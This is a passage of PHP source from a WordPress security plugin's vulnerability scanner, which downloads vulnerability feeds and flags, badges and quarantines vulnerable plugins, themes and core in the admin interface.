         * Function used for first run of the plugin.
         *
         * @return array
         */
        public static function firstRun(): array
        {
	        if ( ! rsssl_user_can_manage() ) {
		        return [];
	        }
            $self = new self();
	        $self->check_files();
	        $self->cache_installed_plugins(true);

	        return [
		        'request_success' => true,
		        'data' =>   $self->workable_plugins
	        ];
        }

	    /**
         * Get site health notice for vulnerabilities
	     * @return array
	     */
	    public function get_site_health_notice(): array {
            if (!rsssl_admin_logged_in()){
                return [];
            }

		    $this->cache_installed_plugins();
		    $risks = $this->count_risk_levels();
            if (count($risks) === 0) {
	            return array(
		            'label'       => __( 'No known vulnerabilities detected', 'really-simple-ssl' ),
		            'status'      => 'good',
		            'badge'       => array(
			            'label' => __('Security'),
			            'color' => 'blue',
		            ),
		            'description' => sprintf(
			            '<p>%s</p>',
			            __( 'No known vulnerabilities detected', 'really-simple-ssl' )
		            ),
		            'actions'     => '',
		            'test'        => 'health_test',
	            );
            }
            $total = 0;
		    foreach ($this->risk_levels as $risk_level => $value) {
                $total += $risks[ $risk_level ] ?? 0;
            }

		    return array(
			    'label'       => __( 'Vulnerabilities detected','really-simple-ssl' ),
			    'status'      => 'critical',
			    'badge'       => array(
				    'label' => __( 'Security' ),
				    'color' => 'blue',
			    ),
			    'description' => sprintf(
				    '<p>%s</p>',
				    sprintf(_n( '%s vulnerability has been detected.', '%s vulnerabilities have been detected.', $total, 'really-simple-ssl' ), number_format_i18n( $total )) . ' '.
				    __( 'Please check the vulnerabilities overview for more information and take appropriate action.' ,'really-simple-ssl' )
			    ),
			    'actions'     => sprintf(
				    '<p><a href="%s" target="_blank" rel="noopener noreferrer">%s</a></p>',
				    esc_url( rsssl_admin_url([], '#settings/vulnerabilities/vulnerabilities-overview') ),
				    __( 'View vulnerabilities', 'really-simple-ssl' )
			    ),
			    'test' => 'rsssl_vulnerabilities',
		    );
        }

        public function show_help_notices($notices)
        {
            $this->cache_installed_plugins();
            $risks = $this->count_risk_levels();
	        $level_to_show_on_dashboard = rsssl_get_option('vulnerability_notification_dashboard');
	        $level_to_show_sitewide = rsssl_get_option('vulnerability_notification_sitewide');
            foreach ($this->risk_levels as $risk_level => $value) {
                if ( !isset($risks[$risk_level]) ) {
                    continue;
                }
                //this is shown bases on the config of vulnerability_notification_dashboard
                $siteWide = false;
                $dashboardNotice = false;
                if ( $level_to_show_on_dashboard && $level_to_show_on_dashboard !== '*') {
                    if ($value >= $this->risk_levels[$level_to_show_on_dashboard]) {
	                    $dashboardNotice = true;
                    }
                }
                if ($level_to_show_sitewide && $level_to_show_sitewide !== '*') {
                    if ($value >= $this->risk_levels[$level_to_show_sitewide]) {
                        $siteWide = true;
                    }
                }
                if ( !$dashboardNotice && !$siteWide ) {
                    continue;
                }

                $count = $risks[$risk_level];
	            $title = $this->get_warning_string($risk_level, $count);
                $notice = [
                    'callback' => '_true_',
                    'score' => 1,
                    'show_with_options' => ['enable_vulnerability_scanner'],
                    'output' => [
                        'true' => [
                            'title' => $title,
                            'msg' => $title.' '.__('Please take appropriate action.','really-simple-ssl'),
                            'icon' => ($risk_level === 'c' || $risk_level==='h') ? 'warning' : 'open',
                            'type' => 'warning',
                            'dismissible' => true,
                            'admin_notice' => $siteWide,
                            'plusone' => true,
                            'highlight_field_id' => 'vulnerabilities-overview',
                        ]
                    ],
                ];
                $notices['risk_level_' . $risk_level] = $notice;

            }
            //now we add the test notices for admin and dahboard.

            //if the option is filled, we add the test notice.
            $test_id = get_option('test_vulnerability_tester');
            if($test_id) {
	            $dashboard = rsssl_get_option('vulnerability_notification_dashboard');
	            $side_wide = rsssl_get_option('vulnerability_notification_sitewide');

	            $site_wide_icon = $side_wide === 'l' || $side_wide === 'm' ? 'open' : 'warning';
	            if ( $side_wide === 'l' || $side_wide === 'm' || $side_wide === 'h' || $side_wide === 'c') {
		            $notices[ 'test_vulnerability_sitewide_' .$test_id ] = [
			            'callback'          => '_true_',
			            'score'             => 1,
			            'show_with_options' => [ 'enable_vulnerability_scanner' ],
			            'output'            => [
				            'true' => [
					            'title'        => __( 'Site wide - Test Notification', 'really-simple-ssl' ),
					            'msg'          => __( 'This is a test notification from Really Simple Security. You can safely dismiss this message.', 'really-simple-ssl' ),
					            'url' => rsssl_admin_url([], '#settings/vulnerabilities/vulnerabilities-overview'),
					            'icon'         => $site_wide_icon,
					            'dismissible'  => true,
					            'admin_notice' => true,
					            'plusone'      => true,
				            ]
			            ]
		            ];
	            }

                //don't add this one if the same level
	            $dashboard_icon = $dashboard === 'l' || $dashboard === 'm' ? 'open' : 'warning';
	            if ($dashboard_icon !== $site_wide_icon) {
	                if ( $dashboard === 'l' || $dashboard === 'm' || $dashboard === 'h' || $dashboard === 'c' ) {
		                $notices[ 'test_vulnerability_dashboard_' .$test_id ] = [
			                'callback'          => '_true_',
			                'score'             => 1,
			                'show_with_options' => [ 'enable_vulnerability_scanner' ],
			                'output'            => [
				                'true' => [
					                'title'        => __( 'Dashboard - Test Notification', 'really-simple-ssl' ),
					                'msg'          => __( 'This is a test notification from Really Simple Security. You can safely dismiss this message.', 'really-simple-ssl' ),
					                'icon'         => $dashboard_icon,
					                'dismissible'  => true,
					                'admin_notice' => false,
					                'plusone'      => true,
				                ]
			                ]
		                ];
	                }
                }
            }

            return $notices;
        }

        /**
         * Generate plugin files for testing purposes.
         *
         * @return array
         */
        public static function testGenerator(): array
        {
            $mail_notification = rsssl_get_option('vulnerability_notification_email_admin');
            if ( $mail_notification === 'l' || $mail_notification === 'm' || $mail_notification === 'h' || $mail_notification === 'c' ) {
                $mailer = new rsssl_mailer();
                $mailer->send_test_mail();
            }
            return [];
        }


        /* Public Section 2: DataGathering */

		/**
		 * @param $stats
		 *
		 * @return array
		 */
        public function get_stats($stats): array
        {
	        if ( ! rsssl_user_can_manage() ) {
		        return $stats;
	        }

	        $this->cache_installed_plugins();
            //now we only get the data we need.
            $vulnerabilities = array_filter($this->workable_plugins, static function ($plugin) {
                if (isset($plugin['vulnerable']) && $plugin['vulnerable']) {
                    return $plugin;
                }
                return false;
            });

	        $time = $this->get_file_stored_info(true);
	        $stats['vulnerabilities'] = count($vulnerabilities);
	        $stats['vulList'] = $vulnerabilities;
            $riskData = $this->measures_data();
            $stats['riskData'] = $riskData['data'];
	        $stats['lastChecked'] = $time;
            return $stats;
        }


	    /**
	     * This combines the vulnerabilities with the installed plugins
	     *
	     * And loads it into a memory cache on page load
	     *
	     */
	    public function cache_installed_plugins($force_update=false): void
	    {
		    if ( ! rsssl_admin_logged_in() ) {
			    return;
		    }

            if ( !$force_update && !empty($this->workable_plugins) ) {
                return;
            }
		    //first we get all installed plugins
		    $installed_plugins = get_plugins();

		    $installed_themes = wp_get_themes();
		    //we flatten the array
		    $update = get_site_transient('update_themes');
		    //we make the installed_themes look like the installed_plugins
		    $installed_themes = array_map( static function ($theme) use ($update) {
			    return [
				    'Name' => $theme->get('Name'),
				    'Slug' => $theme->get('TextDomain'),
				    'description' => $theme->get('Description'),
				    'Version' => $theme->get('Version'),
				    'Author' => $theme->get('Author'),
				    'AuthorURI' => $theme->get('AuthorURI'),
				    'PluginURI' => $theme->get('ThemeURI'),
				    'TextDomain' => $theme->get('TextDomain'),
				    'RequiresWP' => $theme->get('RequiresWP'),
				    'RequiresPHP' => $theme->get('RequiresPHP'),
                    'update_available' => isset($update->response[$theme->get('TextDomain')]),
			    ];
		    }, $installed_themes);

		    //we add a column type to all values in the array
		    $installed_themes = array_map( static function ($theme) {
			    $theme['type'] = 'theme';
			    return $theme;
		    }, $installed_themes);

		    //we add a column type to all values in the array
            //this resets the array keys (currently slugs) so we preserve them in the 'Slug' column.
		    $update = get_site_transient('update_plugins');
		    $installed_plugins = array_map( static function ($plugin, $slug) use ($update) {
  			    $plugin['type'] = 'plugin';
			    $plugin['update_available'] = isset($update->response[$slug]);
                $plugin['Slug'] = dirname($slug);
                $plugin['File'] = $slug;
			    return $plugin;
		    }, $installed_plugins, array_keys($installed_plugins) );

		    //we merge the two arrays
		    $installed_plugins = array_merge($installed_plugins, $installed_themes);

		    //now we get the components from the file
		    $components = $this->get_components();
            //We loop through plugins and check if they are in the components array
		    foreach ($installed_plugins as $plugin) {
			    $slug = $plugin['Slug'];
			    $plugin['vulnerable'] = false;
			    if( $plugin['type'] === 'theme' ) {
				    // we check if the theme exists as a directory
                    $plugin['folder_exists'] = file_exists(get_theme_root() . '/' . $slug );
			    }

			    if( $plugin['type'] === 'plugin' ) {
				    //also we check if the folder exists for the plugin we added this check for later purposes
                    $plugin['folder_exists'] = file_exists(WP_PLUGIN_DIR . '/' . dirname($slug) );
			    }

			    //if there are no components, we return
			    if ( !empty($components) ) {
				    foreach ($components as $component) {
					    if ($plugin['Slug'] === $component->slug) {
						    if (!empty($component->vulnerabilities) && $plugin['folder_exists'] === true) {
							    $plugin['vulnerable'] = true;
							    $plugin['risk_level'] = $this->get_highest_vulnerability($component->vulnerabilities);
							    $plugin['rss_identifier'] = $this->getLinkedUUID($component->vulnerabilities, $plugin['risk_level']);
							    $plugin['risk_name'] = $this->risk_naming[$plugin['risk_level']];
							    $plugin['date'] = $this->getLinkedDate($component->vulnerabilities, $plugin['risk_level']);
						    }
					    }
				    }
			    }

			    //we walk through the components array
			    $this->workable_plugins[$slug] = $plugin;
		    }


		    //now we get the core information
		    $core = $this->get_core();

		    //we create a plugin like entry for core to add to the workable_plugins array
		    $core_plugin = [
			    'Name' => 'WordPress',
			    'Slug' => 'wordpress',
			    'Version' => $core->version?? '',
			    'Author' => 'WordPress',
			    'AuthorURI' => 'https://wordpress.org/',
			    'PluginURI' => 'https://wordpress.org/',
			    'TextDomain' => 'wordpress',
			    'type' => 'core',
		    ];
		    $core_plugin['vulnerable'] = false;
		    //we check if there is an update available
		    $update = get_site_transient('update_core');
		    if (isset($update->updates[0]->response) && $update->updates[0]->response === 'upgrade') {
			    $core_plugin['update_available'] = true;
		    } else {
			    $core_plugin['update_available'] = false;
		    }
		    //if there are no components, we return
		    if ( !empty($core->vulnerabilities) ) {
			    $core_plugin['vulnerable'] = true;
			    $core_plugin['risk_level'] = $this->get_highest_vulnerability($core->vulnerabilities);
			    $core_plugin['rss_identifier'] = $this->getLinkedUUID($core->vulnerabilities, $core_plugin['risk_level']);
			    $core_plugin['risk_name'] = $this->risk_naming[$core_plugin['risk_level']];
			    $core_plugin['date'] = $this->getLinkedDate($core->vulnerabilities, $core_plugin['risk_level']);
		    }
		    //we add the core plugin to the workable_plugins array
		    $this->workable_plugins['wordpress'] = $core_plugin;
        }


        /* Public Section 3: The plugin page add-on */
        /**
         * Callback for the manage_plugins_columns hook to add the vulnerability column
         *
         * @param $columns
         */
        public function add_vulnerability_column($columns)
        {
            $columns['vulnerability'] = __('Vulnerabilities', 'really-simple-ssl');

            return $columns;
        }

        /**
         * Get the data for the risk vulnerabilities table
         * @param $data
         * @return array
         */
        public function measures_data(): array
        {
            $measures = [];
            $measures[] = [
                'id' => 'force_update',
                'name' => __('Force update', 'really-simple-ssl'),
                'value' => get_option('rsssl_force_update'),
                'description' => sprintf(__('Will run a frequent update process on vulnerable components.', 'really-simple-ssl'), $this->riskNaming('l')),
            ];
            $measures[] = [
                'id' => 'quarantine',
                'name' => __('Quarantine', 'really-simple-ssl'),
                'value' => get_option('rsssl_quarantine'),
                'description' => sprintf(__('Components will be quarantined if the update process fails.', 'really-simple-ssl'), $this->riskNaming('m')),
            ];

            return [
                "request_success" => true,
                'data' => $measures
            ];
        }

	    /**
         * Store the mesures from the api
	     * @param $measures
	     *
	     * @return array
	     */
        public function measures_set($measures): array {
            if (!rsssl_user_can_manage()) {
                return [];
            }

            $risk_data = $measures['riskData'] ?? [];
	        foreach ( $risk_data as $risk ) {
                if ( !isset($risk['value']) ) {
                    continue;
                }
                update_option('rsssl_'.sanitize_title($risk['id']), $this->sanitize_measure($risk['value']), false );
            }
            return [];
        }

	    /**
         * Sanitize a measure
         *
	     * @param string $measure
	     *
	     * @return mixed|string
	     */
        public function sanitize_measure($measure) {
            return isset($this->risk_levels[$measure]) ? $measure : '*';
        }

        /**
         * Callback for the manage_plugins_custom_column hook to add the vulnerability field
         *
         * @param string $column_name
         * @param string $plugin_file
         */
        public function add_vulnerability_field( string $column_name, string $plugin_file): void {
            if ( ( $column_name === 'vulnerability' ) ) {
	            $this->cache_installed_plugins();
                if ($this->check_vulnerability( $plugin_file ) ) {
	                switch ( $this->check_severity( $plugin_file ) ) {
		                case 'c':
			                printf(
                                    '<a class="rsssl-btn-vulnerable rsssl-critical" target="_blank" rel="noopener noreferrer" href="%s">%s</a>',
				                    rsssl_link('vulnerability/' . $this->getIdentifier( $plugin_file ) ),
                                    ucfirst( $this->risk_naming['c'] )
                            );
			                break;
		                case 'h':
			                printf(
                                    '<a class="rsssl-btn-vulnerable rsssl-high" target="_blank" rel="noopener noreferrer" href="%s">%s</a>',
				                    rsssl_link('vulnerability/' . $this->getIdentifier( $plugin_file ) ),
                                    ucfirst( $this->risk_naming['h'] )
                            );
			                break;
		                case 'm':
			                printf(
                                    '<a class="rsssl-btn-vulnerable rsssl-medium" target="_blank" rel="noopener noreferrer" href="%s">%s</a>',
				                    rsssl_link('vulnerability/' . $this->getIdentifier( $plugin_file ) ),
                                    ucfirst( $this->risk_naming['m'] )
                            );
			                break;
		                default:
			                echo sprintf(
                                    '<a class="rsssl-btn-vulnerable rsssl-low" target="_blank" rel="noopener noreferrer" href="%s">%s</a>',
				                    rsssl_link('vulnerability/' . $this->getIdentifier( $plugin_file ) ),
                                    ucfirst( $this->risk_naming['l'] )
                            );
			                break;
	                }
                }
                if ( $this->is_quarantined($plugin_file)) {
	                echo sprintf( '<a class="rsssl-btn-vulnerable rsssl-critical" target="_blank" rel="noopener noreferrer" href="%s">%s</a>',
		                'https://really-simple-ssl.com/instructions/about-vulnerabilities/#quarantine' , __("Quarantined","really-simple-ssl") );
                }
            }
        }

        /**
         * Callback for the admin_enqueue_scripts hook to add the vulnerability styles
         *
         * @param $hook
         *
         * @return void
         */
        public function add_vulnerability_styles($hook)
        {
            if ('plugins.php' !== $hook) {
                return;
            }
            //only on settings page
            $rtl = is_rtl() ? 'rtl/' : '';
            $url = trailingslashit(rsssl_url) . "assets/css/{$rtl}rsssl-plugin.min.css";
            $path = trailingslashit(rsssl_path) . "assets/css/{$rtl}rsssl-plugin.min.css";
            if (file_exists($path)) {
                wp_enqueue_style('rsssl-plugin', $url, array(), rsssl_version);
            }
        }

        /**
         * checks if the plugin is vulnerable
         *
         * @param $plugin_file
         *
         * @return mixed
         */
        private function check_vulnerability($plugin_file)
        {
            return $this->workable_plugins[ dirname($plugin_file) ]['vulnerable'] ?? false;
        }

	    /**
         * Check if a plugin is quarantined
	     *
	     * @param string $plugin_file
	     *
	     * @return bool
	     */
	    private function is_quarantined(string $plugin_file): bool {
            return strpos($plugin_file, '-rsssl-q-')!==false;
	    }

        /**
         * checks if the plugin's severity closed
         *
         * @param $plugin_file
         *
         * @return mixed
         */
        private function check_severity($plugin_file)
        {
            return $this->workable_plugins[dirname($plugin_file)]['risk_level'];
        }

        private function getIdentifier($plugin_file)
        {
            return $this->workable_plugins[dirname($plugin_file)]['rss_identifier'];
        }
        /* End of plug-in page add-on */


        /* Public and private functions | Files and storage */

        /**
         * Checks the files on age and downloads if needed.
         *
         * @return void
         */
        public function check_files(): void
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }

            //we download the manifest file if it doesn't exist or is older than 12 hours
            if ($this->validate_local_file(false, true)) {
                if ( $this->get_file_stored_info(false, true) < time() - $this->interval ) {
                    $this->download_manifest();
                }
            } else {
                $this->download_manifest();
            }
            //We check the core vulnerabilities and validate age and existence
            if ($this->validate_local_file(true, false)) {
                //if the file is younger than 12 hours, we don't download it again.
                if ($this->get_file_stored_info(true) < time() - $this->interval ) {
                    $this->download_core_vulnerabilities();
                }

            } else {
                $this->download_core_vulnerabilities();
            }

            //We check the plugin vulnerabilities and validate age and existence
            if ($this->validate_local_file()) {
                if ($this->get_file_stored_info() < time() - $this->interval ) {
                    $this->download_plugin_vulnerabilities();
                }
            } else {
                $this->download_plugin_vulnerabilities();
            }
        }


        /**
         * Checks if the file is valid and exists. It checks three files: the manifest, the core vulnerabilities and the plugin vulnerabilities.
         *
         * @param bool $isCore
         * @param bool $manifest
         *
         * @return bool
         */
        private function validate_local_file(bool $isCore = false, bool $manifest = false): bool
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return false;
	        }
            if (!$manifest) {
                //if we don't check for the manifest, we check the other files.
                $isCore ? $file = 'core.json' : $file = 'components.json';
            } else {
                $file = 'manifest.json';
            }

            $upload_dir = Rsssl_File_Storage::get_upload_dir();
            $file = $upload_dir . '/' . $file;
            if (file_exists($file)) {
                //now we check if the file is older than 3 days, if so, we download it again
                $file_time = filemtime($file);
                $now = time();
                $diff = $now - $file_time;
                $days = floor($diff / (60 * 60 * 24));
                if ($days < 1) {
                    return true;
                }
            }

            return false;
        }


        /**
         * Downloads bases on given url
         *
         * @param string $url
         *
         * @return mixed|null
         * @noinspection PhpComposerExtensionStubsInspection
         */
        private function download(string $url)
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return null;
	        }

            //now we check if the file remotely exists and then log an error if it does not.
            $response = wp_remote_get( $url );
            if ( is_wp_error( $response ) ) {
                return null;
            }

            if ( wp_remote_retrieve_response_code($response) !== 200 ) {
                return null;
            }

            $json = wp_remote_retrieve_body($response);
            return json_decode($json);
        }

	    private function remote_file_exists($url): bool {
		    try {
			    $headers = @get_headers($url);
			    if ($headers === false) {
				    // URL is not accessible or some error occurred
				    return false;
			    }

			    // Check if the HTTP status code starts with "200" (indicating success)
			    return strpos($headers[0], '200') !== false;
			    // Rest of your code handling $headers goes here
		    } catch (Exception $e) {
			    return false;
            }

	    }

        /**
         * Stores a full core or component file in the upload folder
         *
         * @param $data
         * @param bool $isCore
         * @param bool $manifest
         *
         * @return void
         */
        private function store_file($data, bool $isCore = false, bool $manifest = false): void
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }
	        //we get the upload directory
	        $upload_dir = Rsssl_File_Storage::get_upload_dir();

	        if ( !$manifest ) {
		        $file = $upload_dir . '/' . ($isCore ? 'core.json' : 'components.json');
	        } else {
		        $file = $upload_dir . '/manifest.json';
	        }

	        //we delete the old file if it exists
	        if ( file_exists($file) ) {
		        wp_delete_file($file);
	        }

            //if the data is empty, we return null
            if ( empty($data) ) {
                return;
            }

	        Rsssl_File_Storage::StoreFile($file, $data);
            $this->jsons_files_updated = true;
        }

        public function get_file_stored_info($isCore = false, $manifest = false)
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return false;
	        }

            $upload_dir = Rsssl_File_Storage::get_upload_dir();

            if ($manifest) {
                $file = $upload_dir . '/manifest.json';
                if (!file_exists($file)) {
                    return false;
                }

                return Rsssl_File_Storage::GetDate($file);
            }
            $file = $upload_dir . '/' . ($isCore ? 'core.json' : 'components.json');
            if (!file_exists($file)) {
                return false;
            }

            return Rsssl_File_Storage::GetDate($file);
        }

        /* End of files and Storage */

        /* Section for the core files Note: No manifest is needed */

        /**
         * Downloads the vulnerabilities for the current core version.
         *
         * @return void
         */
        protected function download_core_vulnerabilities(): void
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }
            global $wp_version;
            $url = self::RSSSL_SECURITY_API . 'core/WordPress.json';
            $data = $this->download($url);
            if (!$data) {
                return;
            }

            $data->vulnerabilities = $this->filter_vulnerabilities($data->vulnerabilities, $wp_version, true);

            //first we store this as a json file in the uploads folder
            $this->store_file($data, true);
        }

        /* End of core files section */


        /* Section for the plug-in files */
        /**
         * Downloads the vulnerabilities for the current plugins.
         *
         * @return void
         */
        protected function download_plugin_vulnerabilities(): void
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }
            //we get all the installed plugins
            $installed_plugins = get_plugins();
            //first we get the manifest file
            $manifest = $this->getManifest();
            $vulnerabilities = [];
            foreach ($installed_plugins as $file => $plugin) {
                $slug = dirname($file);
	            $installed_plugins[ $file ]['Slug'] = $slug;
                $url = self::RSSSL_SECURITY_API . 'plugin/' . $slug . '.json';
                //if the plugin is not in the manifest, we skip it
                if (!in_array($slug, (array)$manifest)) {
                    continue;
                }
                $data = $this->download($url);
                if ($data !== null) {
                    $vulnerabilities[] = $data;
                }
            }
            //we also do it for all the installed themes
            $installed_themes = wp_get_themes();
            foreach ($installed_themes as $theme) {
                $theme = $theme->get('TextDomain');
                $url = self::RSSSL_SECURITY_API . 'theme/' . $theme . '.json';

                //if the plugin is not in the manifest, we skip it
                if (!in_array($theme, (array)$manifest)) {
                    continue;
                }

                $data = $this->download($url);

                if ($data !== null) {
                    $vulnerabilities[] = $data;
                }
            }

            //we make the installed_themes look like the installed_plugins
            $installed_themes = array_map( static function ($theme) {
                return [
                    'Name' => $theme->get('Name'),
                    'Slug' => $theme->get('TextDomain'),
                    'description' => $theme->get('Description'),
                    'Version' => $theme->get('Version'),
                    'Author' => $theme->get('Author'),
                    'AuthorURI' => $theme->get('AuthorURI'),
                    'PluginURI' => $theme->get('ThemeURI'),
                    'TextDomain' => $theme->get('TextDomain'),
                    'RequiresWP' => $theme->get('RequiresWP'),
                    'RequiresPHP' => $theme->get('RequiresPHP'),
                ];
            }, $installed_themes);

            //we merge $installed_plugins and $installed_themes
            $installed_plugins = array_merge($installed_plugins, $installed_themes);
            //we filter the vulnerabilities
            $vulnerabilities = $this->filter_active_components($vulnerabilities, $installed_plugins);
            $this->store_file($vulnerabilities);
        }

        /**
         * Loads the info from the files Note this is also being used for the themes.
         *
         * @return mixed|null
         */
        private function get_components()
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return [];
	        }
            $upload_dir = Rsssl_File_Storage::get_upload_dir();

            $file = $upload_dir . '/components.json';
            if (!file_exists($file)) {
                return [];
            }

            $components =  Rsssl_File_Storage::GetFile($file);
            if (!is_array($components)) $components = [];
            return $components;
        }

        /* End of plug-in files section */

        /* Section for the core files Note: No manifest is needed */
        private function get_core()
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return null;
	        }

            $upload_dir = Rsssl_File_Storage::get_upload_dir();

            $file = $upload_dir . '/core.json';
            if (!file_exists($file)) {
                return false;
            }

            return Rsssl_File_Storage::GetFile($file);
        }

        /* Section for the theme files */

        public function enable_feedback_in_theme(): void {
            //Logic here for theme warning Create Callback and functions for these steps
            //we only display the warning for the theme page
            add_action('current_screen', [$this, 'show_theme_warning']);
        }

        public function show_theme_warning($hook)
        {
            $screen = get_current_screen();

            if ($screen && $screen->id !== 'themes') {
                return;
            }

            //we add warning scripts to themes
            add_action('admin_enqueue_scripts', [$this, 'enqueue_theme_warning_scripts']);

        }

        public function show_inline_code($hook): void {
            if ($hook !== 'themes.php') {
                return;
            }
            //we add warning scripts to themes
            add_action('admin_footer', [$this, 'enqueue_theme_warning_scripts']);
        }

        public function enqueue_theme_warning_scripts(): void {
            //we get all components with vulnerabilities
            $components = $this->get_components();
            ob_start();?>
                <script>
                    window.addEventListener("load", () => {
                    let style = document.createElement('style');
                    let vulnerable_components = [<?php echo implode(',', array_map(function ($component) {
                        return "{slug: '" . esc_attr($component->slug) . "', risk: '" . esc_attr($this->get_highest_vulnerability($component->vulnerabilities)) . "'}";
                    }, $components)) ?>];

                    //we create the style for warning
                    style.innerHTML = '.rsssl-theme-notice {box-shadow: 0 1px 1px 0 rgba(0,0,0,.1); position:relative; z-index:50; margin-bottom: -35px; padding: 8px 12px;}';
                    style.innerHTML += '.rsssl-theme-notice-warning {background-color: #FFF6CE; border-left: 4px solid #ffb900;}';
                    //we create the style for danger
                    style.innerHTML += '.rsssl-theme-notice-danger {background-color: #FFCECE; border-left: 4px solid #dc3232;}';
                    style.innerHTML += '.rsssl-theme-notice-below-notice{margin-top: 41px;}';
                    style.innerHTML += '.rsssl-theme-notice-warning .dashicons, .rsssl-theme-notice-danger .dashicons{margin-right: 12px;}';
                    let levels = <?php echo json_encode($this->risk_naming)?>;

                    //we add the style to the head
                    document.head.appendChild(style);
                    //we loop through the components
                    vulnerable_components.forEach(function(component) {
                        //we get the theme element
                        let theme_element = document.querySelector(".theme[data-slug='"+component.slug+"']");
                        //if the theme exists
                        if (theme_element) {
                            //check if theme element contains notice. if so, push this notice down with class rsssl-theme-notice-below-notice
                            let hasNotice = theme_element.querySelector('.update-message.notice');
                            //we check the risk
                            let level = levels[component.risk];
                            let text = '<?php echo esc_attr(__('Vulnerability: %s', 'really-simple-ssl')) ?>';
                            text = text.replace('%s', level);
                            let divClass = ' rsssl-theme-notice ';
                            divClass += component.risk === 'h' || component.risk === 'c' ? 'rsssl-theme-notice-danger' : 'rsssl-theme-notice-warning';
                            if (hasNotice) divClass += ' rsssl-theme-notice-below-notice';
                            theme_element.insertAdjacentHTML('afterbegin', `
                              <div class="${divClass}">
                                <div><span class="dashicons dashicons-info"></span>${text}</div>
                              </div>
                            `);
                        }
                    });
                    //find quarantined themes, find all themes where the data-slug contains '-rsssl-q'
                    document.querySelectorAll(".theme[data-slug*='-rsssl-q']").forEach(function(theme_element) {
                        //if the theme exists
                        if ( theme_element ) {
                            //we check the risk
                            let text = '<?php echo esc_attr(__('Quarantined', 'really-simple-ssl')) ?>';
                            let divClass = 'rsssl-theme-notice rsssl-theme-notice-danger';
                            theme_element.insertAdjacentHTML('afterbegin', `
                              <div class="${divClass}">
                                <div><span class="dashicons dashicons-info"></span>
                                    <a href="https://really-simple-ssl.com/instructions/about-vulnerabilities/#quarantine" target="_blank" rel="noopener noreferrer">${text}</a>
                                </div>
                              </div>
                            `);
                        }
                    });
                });
            </script>
            <?php
            echo ob_get_clean();
        }

        /* End of theme files section */


        /* Private functions | Filtering and walks */

        /**
         * Filters the components based on the active plugins
         *
         * @param $components
         * @param array $active_plugins
         *
         * @return array
         */
        private function filter_active_components($components, array $active_plugins): array
        {
            $active_components = [];
            foreach ($components as $component) {
                foreach ($active_plugins as $active_plugin) {
                    if (isset($component->slug) && $component->slug === $active_plugin['Slug']) {
                        //now we filter out the relevant vulnerabilities
                        $component->vulnerabilities = $this->filter_vulnerabilities($component->vulnerabilities, $active_plugin['Version']);
                        //if we have vulnerabilities, we add the component to the active components or when the plugin is closed
                        if (count($component->vulnerabilities) > 0 || $component->status === 'closed') {
                            $active_components[] = $component;
                        }
                    }
                }
            }

            return $active_components;
        }

        /**
         * This function adds the vulnerability with the highest risk to the plugins page
         *
         * @param $vulnerabilities
         *
         * @return string
         */
        private function get_highest_vulnerability($vulnerabilities): string
        {
            //we loop through the vulnerabilities and get the highest risk level
            $highest_risk_level = 0;

            foreach ($vulnerabilities as $vulnerability) {
                if ($vulnerability->severity === null) {
                    continue;
                }
                if (!isset($this->risk_levels[$vulnerability->severity])) {
                    continue;
                }
                if ($this->risk_levels[$vulnerability->severity] > $highest_risk_level) {
                    $highest_risk_level = $this->risk_levels[$vulnerability->severity];
                }
            }
            //we now loop through the risk levels and return the highest one
            foreach ($this->risk_levels as $key => $value) {
                if ($value === $highest_risk_level) {
                    return $key;
                }
            }

            return 'l';
        }

        /* End of private functions | Filtering and walks */


        /* Private functions | End of Filtering and walks */


        /* Private functions | Feedback, Styles and scripts */

        /**
         * This function shows the feedback in the plugin
         *
         * @return void
         */
        private function enable_feedback_in_plugin(): void {
            //we add some styling to this page
            add_action('admin_enqueue_scripts', array($this, 'add_vulnerability_styles'));
            //we add an extra column to the plugins page
            add_filter('manage_plugins_columns', array($this, 'add_vulnerability_column'));
            add_filter('manage_plugins-network_columns', array($this, 'add_vulnerability_column'));
            //now we add the field to the plugins page
            add_action('manage_plugins_custom_column', array($this, 'add_vulnerability_field'), 10, 3);
            add_action('manage_plugins-network_custom_column', array($this, 'add_vulnerability_field'), 10, 3);
        }

        /* End of private functions | Feedback, Styles and scripts */

        /**
         * This function downloads the manifest file from the api server
         *
         * @return void
         */
        private function download_manifest(): void {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }
            $url = self::RSSSL_SECURITY_API . 'manifest.json';
            $data = $this->download($url);

            //we convert the data to an array
            $data = json_decode(json_encode($data), true);

            //first we store this as a json file in the uploads folder
            $this->store_file($data, true, true);
        }

        /**
         * This function downloads the created file from the uploads
         *
         * @return false|void
         */
        private function getManifest()
        {
	        if ( ! rsssl_admin_logged_in() ) {
		        return false;
	        }

            $upload_dir = Rsssl_File_Storage::get_upload_dir();

            $file = $upload_dir . '/manifest.json';
            if (!file_exists($file)) {
                return false;
            }

            return Rsssl_File_Storage::GetFile($file);
        }

        private function filter_vulnerabilities($vulnerabilities, $Version, $core = false): array {
	        $filtered_vulnerabilities = array();
	        foreach ( $vulnerabilities as $vulnerability ) {
		        //if fixed_in contains a version, and the current version is higher than the fixed_in version, we skip it as fixed.
		        //This needs to be a positive check only, as the fixed_in value is less accurate than the version_from and version_to values
		        if ( function_exists( 'rsssl_version_compare' ) ) {
			        if ( $vulnerability->fixed_in !== 'not fixed' && rsssl_version_compare( $Version, $vulnerability->fixed_in, '>=' ) ) {
				        continue;
			        }
		        } else {
			        # fallback
			        if ( $vulnerability->fixed_in !== 'not fixed' && version_compare( $Version, $vulnerability->fixed_in, '>=' ) ) {
				        continue;
			        }
		        }

		        //we have the fields version_from and version_to and their needed operators
		        $version_from  = $vulnerability->version_from;
		        $version_to    = $vulnerability->version_to;
		        $operator_from = $vulnerability->operator_from;
		        $operator_to   = $vulnerability->operator_to;
		        //we now check if the version is between the two versions
		        if ( function_exists( 'rsssl_version_compare' ) ) {
			        if ( rsssl_version_compare( $Version, $version_from, $operator_from ) && rsssl_version_compare( $Version, $version_to, $operator_to ) ) {
				        $filtered_vulnerabilities[] = $vulnerability;
			        }
		        } else {
